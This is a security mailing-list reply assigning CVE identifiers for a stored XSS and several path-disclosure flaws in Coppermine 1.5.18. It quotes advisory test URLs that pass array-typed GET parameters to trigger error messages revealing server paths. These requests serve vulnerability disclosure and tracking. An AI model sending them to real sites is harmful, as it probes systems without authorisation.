Re: CVE-request: Coppermine 1.5.18 waraxe-2012-SA#081

[Kurt Seifried <kseifried () redhat com>]

On 04/03/2012 04:56 AM, Henri Salo wrote:
> On Fri, Mar 30, 2012 at 11:36:23AM -0600, Kurt Seifried wrote:
> > What about the path disclosures?
>
> I was not sure if those are really worth of CVE-identifier(s), but please do assign if you think those are needed. I 
> do not see path disclosure issues as important security vulnerabilities especially if there is path disclosure issues 
> in same version that there is other security vulnerabilities.

Everyone has different definitions and requirements so CVE basically
goes with "is it a security vulnerability" (e.g. does it cross a trust
boundary, etc.).

> If you ask me two 2012 CVE-identifiers are needed. Please correct me in case I am wrong.
>
> 1. Stored XSS edit_one_pic.php keywords

Please use CVE-2012-1613 for this issue.

> 2. Multiple path disclosures in 1.5.18
> 2.1. visiblehookpoints plugin index.php
> 2.2. thumbnails.php GET parameters "page" and "cat"
> 2.3. usermgr.php GET parameter "page"
> 2.4. search.inc.php GET parameters "newer_than" and "older_than"

Please use CVE-2012-1614 for these issues.

> These issues (according to the advisory page) are fixed in: 1.5.20 (I have not tested these). Here is the copypaste 
> from original advisory:
>
> """
> ###############################################################################
> 2. Path Disclosure in "visiblehookpoints" plugin
> ###############################################################################
>
> Test:
>
> http://localhost/cpg1518/plugins/visiblehookpoints/index.php
>
> Result:
>
> Warning: require_once(include/init.inc.php) [function.require-once]:
> failed to open stream: No such file or directory in
> C:apache_wwwcpg1518pluginsvisiblehookpointsindex.php on line 22
>
> Fatal error: require_once() [function.require]:
> Failed opening required 'include/init.inc.php' (include_path='.;C:phppear') in
> C:apache_wwwcpg1518pluginsvisiblehookpointsindex.php on line 22
>
>
> ###############################################################################
> 3. Path Disclosure in "thumbnails.php"
> ###############################################################################
>
> Attack vector: user submitted GET parameters "page" and "cat"
>
> Tests:
>
> http://localhost/cpg1518/thumbnails.php?page[]
> http://localhost/cpg1518/thumbnails.php?cat[]
>
> Results:
>
> Fatal error: Unsupported operand types in
> C:apache_wwwcpg1518includefunctions.inc.php on line 2980
>
> Fatal error: Unsupported operand types in
> C:apache_wwwcpg1518 humbnails.php on line 160
>
>
>
> ###############################################################################
> 4. Path Disclosure in "usermgr.php"
> ###############################################################################
>
> Attack vector: user submitted GET parameter "page"
> Preconditions: admin privileges needed
>
> Test:
>
> http://localhost/cpg1518/usermgr.php?page[]
>
> Result:
>
> Fatal error: Unsupported operand types in
> C:apache_wwwcpg1518usermgr.php on line 185
>
>
> ###############################################################################
> 5. Path Disclosure in "search.inc.php"
> ###############################################################################
>
> Attack vector: user submitted GET parameters "newer_than" and "older_than"
>
> Tests:
>
> http://localhost/cpg1518/thumbnails.php?search=1&album=search&newer_than[]
> http://localhost/cpg1518/thumbnails.php?search=1&album=search&older_than[]
>
> Results:
>
> Fatal error: Unsupported operand types in
> C:apache_wwwcpg1518includesearch.inc.php on line 106
>
> Fatal error: Unsupported operand types in
> C:apache_wwwcpg1518includesearch.inc.php on line 107
> """


-- 
Kurt Seifried Red Hat Security Response Team (SRT)